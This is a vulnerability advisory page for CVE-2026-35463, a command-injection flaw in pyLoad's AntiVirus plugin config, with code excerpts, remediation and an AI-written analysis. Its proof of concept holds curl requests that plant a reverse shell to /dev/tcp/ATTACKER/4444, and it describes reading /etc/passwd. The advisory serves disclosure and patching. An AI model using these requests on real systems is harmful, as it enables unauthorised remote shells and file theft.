Skip to main content

Python CVE-2026-35463

HIGH
OS Command Injection (CWE-78)
2026-04-04 https://github.com/pyload/pyload GHSA-w48f-wwwf-f5fr
8.8
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
8.8 HIGH
AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

3
Re-analysis Queued
Apr 24, 2026 - 15:22 vuln.today
cvss_changed
Analysis Generated
Apr 04, 2026 - 06:45 vuln.today
CVE Published
Apr 04, 2026 - 06:41 nvd
HIGH 8.8

DescriptionGitHub Advisory

Summary

The ADMIN_ONLY_OPTIONS protection mechanism restricts security-critical configuration values (reconnect scripts, SSL certs, proxy credentials) to admin-only access. However, this protection is only applied to core config options, not to plugin config options. The AntiVirus plugin stores an executable path (avfile) in its config, which is passed directly to subprocess.Popen(). A non-admin user with SETTINGS permission can change this path to achieve remote code execution.

Details

Safe wrapper - ADMIN_ONLY_OPTIONS (core/api/__init__.py:225-235):

python
ADMIN_ONLY_OPTIONS = {
    "reconnect.script",
# Blocks script path change
    "webui.host",
# Blocks bind address change
    "ssl.cert_file",
# Blocks cert path change
    "ssl.key_file",
# Blocks key path change
# ... other sensitive options
}

Where it IS enforced - core config (core/api/__init__.py:255):

python
def set_config_value(self, section, option, value):
    if f"{section}.{option}" in ADMIN_ONLY_OPTIONS:
        if not self.user.is_admin:
            raise PermissionError("Admin only")
# ...

Where it is NOT enforced - plugin config (core/api/__init__.py:271-272):

python
# Plugin config - NO admin check at all
    self.pyload.config.set_plugin(category, option, value)

Dangerous sink - AntiVirus plugin (plugins/addons/AntiVirus.py:75):

python
def scan_file(self, file):
    avfile = self.config.get("avfile")
# User-controlled via plugin config
    avargs = self.config.get("avargs")
    subprocess.Popen([avfile, avargs, target])
# RCE

PoC

bash
# As non-admin user with SETTINGS permission:
# 1. Set AntiVirus executable to a reverse shell
curl -b session_cookie -X POST http://TARGET:8000/api/set_config_value \
  -d 'section=plugin' \
  -d 'option=AntiVirus.avfile' \
  -d 'value=/bin/bash'

curl -b session_cookie -X POST http://TARGET:8000/api/set_config_value \
  -d 'section=plugin' \
  -d 'option=AntiVirus.avargs' \
  -d 'value=-c "bash -i >& /dev/tcp/ATTACKER/4444 0>&1"'
# 2. Enable the AntiVirus plugin
curl -b session_cookie -X POST http://TARGET:8000/api/set_config_value \
  -d 'section=plugin' \
  -d 'option=AntiVirus.activated' \
  -d 'value=True'
# 3. Add a download - when it completes, AntiVirus.scan_file() runs the payload
curl -b session_cookie -X POST http://TARGET:8000/api/add_package \
  -d 'name=test' \
  -d 'links=http://example.com/test.zip'
# Result: reverse shell as the pyload process user

Additional Finding: Arbitrary File Read via storage_folder

The storage_folder validation at core/api/__init__.py:238-246 uses inverted logic - it prevents the new value from being INSIDE protected directories, but not from being an ANCESTOR of everything. Setting storage_folder=/ combined with GET /files/get/etc/passwd gives arbitrary file read to non-admin users with SETTINGS+DOWNLOAD permissions.

Impact

  • Remote Code Execution - Non-admin user can execute arbitrary commands via AntiVirus plugin config
  • Privilege escalation - SETTINGS permission (non-admin) escalates to full system access
  • Arbitrary file read - Via storage_folder manipulation

Remediation

Apply ADMIN_ONLY_OPTIONS to plugin config as well:

python
# In set_config_value():
ADMIN_ONLY_PLUGIN_OPTIONS = {
    "AntiVirus.avfile",
    "AntiVirus.avargs",
# ... any plugin option that controls executables or paths
}

if section == "plugin" and option in ADMIN_ONLY_PLUGIN_OPTIONS:
    if not self.user.is_admin:
        raise PermissionError("Admin only")

Or better: validate that avfile points to a known AV binary before passing to subprocess.Popen().

AnalysisAI

Remote code execution in pyLoad download manager allows authenticated non-admin users with SETTINGS permission to execute arbitrary system commands via the AntiVirus plugin configuration. The vulnerability stems from incomplete enforcement of admin-only security controls: while core configuration options like reconnect scripts and SSL certificates require admin privileges, plugin configuration lacks this protection. Attackers can modify the AntiVirus plugin's executable path (avfile) parameter, which is directly passed to subprocess.Popen() without validation, achieving command execution when file downloads complete. CVSS 8.8 reflects network-accessible attack with low complexity requiring only low-privilege authentication. No active exploitation confirmed (not in CISA KEV), but detailed proof-of-concept exists in the GitHub security advisory.

Technical ContextAI

pyLoad (pkg:pip/pyload-ng) is a Python-based download manager with plugin architecture. The application implements ADMIN_ONLY_OPTIONS controls to restrict security-critical core configuration values (reconnect scripts, SSL certificates, proxy credentials) to admin users. However, this protection mechanism only validates core config options at core/api/__init__.py:255, while plugin config modifications at line 271-272 bypass this check entirely. The AntiVirus plugin (plugins/addons/AntiVirus.py:75) retrieves the 'avfile' and 'avargs' configuration values and passes them directly to subprocess.Popen() without sanitization or path validation. This represents a classic OS Command Injection vulnerability (CWE-78) where user-controlled input flows into a command execution sink. The vulnerability also includes an arbitrary file read component via storage_folder path traversal using inverted validation logic that prevents child paths but allows parent directory access.

RemediationAI

Apply vendor-released patch from the pyLoad project available through the GitHub security advisory at https://github.com/pyload/pyload/security/advisories/GHSA-w48f-wwwf-f5fr. The recommended fix extends ADMIN_ONLY_OPTIONS enforcement to plugin configuration by creating an ADMIN_ONLY_PLUGIN_OPTIONS set containing sensitive plugin options like AntiVirus.avfile and AntiVirus.avargs, then validating these before applying plugin config changes. A more robust solution involves whitelisting known antivirus binary paths and validating avfile points to legitimate executables before passing to subprocess.Popen(). As immediate mitigation, restrict SETTINGS permission to admin users only, disable the AntiVirus plugin if not required, or implement filesystem-level restrictions preventing the pyLoad process from executing arbitrary binaries. Organizations should audit which non-admin users have SETTINGS permissions and review plugin configurations for unauthorized modifications.

More in Python

View all
CVE-2025-24016 CRITICAL POC
9.9 Feb 10

Wazuh SIEM platform versions 4.4.0 through 4.9.0 contain an unsafe deserialization vulnerability in the DistributedAPI t

CVE-2025-27520 CRITICAL POC
9.8 Apr 04

BentoML version 1.4.2 and earlier contains an unauthenticated remote code execution vulnerability through insecure deser

CVE-2025-2945 CRITICAL POC
9.9 Apr 03

pgAdmin 4 contains critical remote code execution vulnerabilities in the Query Tool download and Cloud Deployment endpoi

CVE-2013-5093 MEDIUM POC
6.8 Sep 27

The renderLocalView function in render/views.py in graphite-web in Graphite 0.9.5 through 0.9.10 uses the pickle Python

CVE-2025-32375 CRITICAL POC
9.8 Apr 09

BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Rated critica

CVE-2014-0224 HIGH POC
7.4 Jun 05

OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCiph

CVE-2024-21644 HIGH POC
7.5 Jan 08

pyLoad download manager version prior to 0.5.0b3.dev77 exposes the Flask SECRET_KEY through an unauthenticated endpoint.

CVE-2017-9462 HIGH POC
8.8 Jun 06

In Mercurial before 4.1.3, "hg serve --stdio" allows remote authenticated users to launch the Python debugger, and conse

CVE-2026-39987 CRITICAL POC
9.3 Apr 08

Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/

CVE-2024-21645 MEDIUM POC
5.3 Jan 08

pyLoad is the free and open-source Download Manager written in pure Python. Rated medium severity (CVSS 5.3), this vulne

CVE-2026-33017 CRITICAL POC
9.3 Mar 17

Langflow (a visual LLM pipeline builder) contains a critical unauthenticated code execution vulnerability (CVE-2026-3301

CVE-2026-55255 HIGH POC
8.4 Jun 19

Cross-user flow execution in Langflow (< 1.9.1) lets any authenticated API-key holder run another user's flow by passing

Share

CVE-2026-35463 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy